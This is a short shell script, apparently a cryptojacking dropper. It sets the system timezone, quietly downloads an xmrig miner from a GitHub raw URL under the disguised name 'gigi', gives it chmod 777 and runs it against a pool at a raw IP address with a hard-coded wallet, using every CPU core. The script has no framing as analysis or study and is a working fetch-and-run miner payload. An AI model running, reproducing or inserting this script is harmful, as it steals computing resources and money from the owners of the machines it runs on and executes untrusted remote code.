#!/bin/sh
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata
wget -O gigi https://github.com/kazppkido/kikir/raw/main/xmrig > /dev/null 2>&1
chmod 777 gigi
./gigi --donate-level 1 -o 165.232.165.31:80 --wallet 0x0D646f89Db83E0642199e88A7967C7f62af02a83 -p $(shuf -n 1 -i 1-999)-KK -a rx/0 -t $(nproc --all)
